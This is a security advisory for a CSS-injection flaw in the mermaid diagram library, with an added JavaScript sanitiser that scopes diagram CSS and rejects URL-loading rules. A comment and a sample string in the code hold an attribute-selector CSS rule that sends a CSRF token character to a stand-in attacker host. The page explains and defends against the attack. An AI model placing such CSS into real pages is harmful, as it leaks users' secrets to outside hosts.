Possible injection of arbitrary `CSS` into the generated graph, affecting the container HTML
- Severity: Medium
Description
An attacker who can supply diagram text is able to inject arbitrary CSS into the generated graph. Because the injected rules are not confined to the graph, they can change the styling of elements outside it on the embedding page and, with specially crafted CSS selectors, exfiltrate sensitive information from that page.
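The following is an added example, not mermaid's own code or its actual fix. It shows why CSS copied from a diagram into the rendered output must be contained, and one conservative way to contain it: prefix every selector with the diagram container's id so it cannot match the host document, and reject any declaration that can load a URL, which closes the exfiltration channel behind attribute-selector attacks. The container id `mermaid-1`, the function names and the sample rules are assumptions constructed for this example.

```javascript
// Added example (not mermaid's code): contain user-supplied CSS embedded in a
// rendered diagram.
//
// Threat: diagram text ends up in a <style> inside the SVG. Stylesheets are
// not scoped, so a rule such as
//   input[name=csrf][value^="a"] { background: url(https://attacker.example/?v=a) }
// matches elements anywhere on the embedding page and leaks one character of
// a field value per matching rule. Containment here has two parts:
//   1. every selector is prefixed with the container id (assumed "mermaid-1");
//   2. declarations that can fetch a URL are rejected outright.
// Caveat: this is a brace-counting splitter, not a CSS parser. It does not
// understand braces or commas inside quoted strings; a real integration should
// use a proper CSS parser and apply the same two rules.

const NETWORK_DECL = /\burl\s*\(|\bimage-set\s*\(/i;   // properties that fetch
const ALLOWED_AT_RULES = new Set(['@media', '@supports']); // wrappers we recurse into

// Split CSS text into { selector, body } pairs at brace depth 0. Nested blocks
// of @media/@supports stay inside body for recursive handling; statements
// terminated by ';' (e.g. @import ...;) come back with an empty body.
function splitRules(css) {
  const rules = [];
  let depth = 0, selStart = 0, bodyStart = 0, selector = '';
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (c === '{') {
      if (depth === 0) { selector = css.slice(selStart, i).trim(); bodyStart = i + 1; }
      depth++;
    } else if (c === '}') {
      depth--;
      if (depth < 0) throw new Error('unbalanced "}"');
      if (depth === 0) { rules.push({ selector, body: css.slice(bodyStart, i) }); selStart = i + 1; }
    } else if (c === ';' && depth === 0) {
      rules.push({ selector: css.slice(selStart, i).trim(), body: '' });
      selStart = i + 1;
    }
  }
  if (depth !== 0) throw new Error('unbalanced "{"');
  return rules;
}

// Rewrite each rule so it can only match inside #containerId; throw on
// anything that cannot be made safe (URL-loading declarations, other at-rules).
function scopeRules(css, containerId) {
  const out = [];
  for (const { selector, body } of splitRules(css)) {
    if (!selector) continue;                       // stray ';' or empty rule
    if (selector.startsWith('@')) {
      const name = selector.split(/[\s(]/)[0].toLowerCase();
      if (!ALLOWED_AT_RULES.has(name)) throw new Error(`rejected at-rule: ${name}`);
      out.push(`${selector} { ${scopeRules(body, containerId)} }`);
      continue;
    }
    if (NETWORK_DECL.test(body)) {
      throw new Error(`rejected declaration under "${selector}": may load a URL`);
    }
    // Each comma-separated selector gets its own prefix, so ".node, body"
    // cannot smuggle an unscoped "body" through.
    const scoped = selector.split(',').map(s => `#${containerId} ${s.trim()}`).join(', ');
    out.push(`${scoped} { ${body.trim()} }`);
  }
  return out.join('\n');
}

// Public entry point: { ok: true, css } with every rule confined to
// #containerId, or { ok: false, reason } if the input must be dropped.
function sanitizeDiagramCss(css, containerId) {
  try {
    const stripped = css.replace(/\/\*[\s\S]*?\*\//g, ''); // comments first, so "/* } */" cannot confuse the splitter
    return { ok: true, css: scopeRules(stripped, containerId) };
  } catch (e) {
    return { ok: false, reason: e.message };
  }
}

// Constructed samples: a benign theme rule and an exfiltration attempt.
const SAMPLE_BENIGN = '.node rect { fill: #f9f; }';
const SAMPLE_HOSTILE = 'input[name=csrf][value^="a"] { background: url(https://attacker.example/?v=a); }';
console.log(sanitizeDiagramCss(SAMPLE_BENIGN, 'mermaid-1'));
console.log(sanitizeDiagramCss(SAMPLE_HOSTILE, 'mermaid-1'));
```

Scoping alone is not enough: a prefixed selector still matches anything that happens to live inside the container, and a URL-loading property inside the container can still carry data off the page, which is why the second rule rejects `url(` regardless of selector. Conversely, the rejection list alone would not stop the "change the styling of elements outside the graph" half of the advisory, which is what the id prefix addresses.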
Recommendation
Update the mermaid package to a patched version. Version details:
- Affected version(s): >= 8.0.0, < 9.1.2
- Patched version(s): 9.1.2
References
Related Issues
- Astro allows unauthorized third-party images in _image endpoint (GHSA-xf8x-j4p2-f749) - CVE-2025-55303
- jsondiffpatch is vulnerable to Cross-site Scripting (XSS) via HtmlFormatter::nodeBegin - CVE-2025-9910
- Vite middleware may serve files starting with the same name with the public directory - CVE-2025-58751
- Mermaid improperly sanitizes sequence diagram labels leading to XSS - CVE-2025-54881
- Tags:
- npm
- mermaid
Last updated on July 21, 2023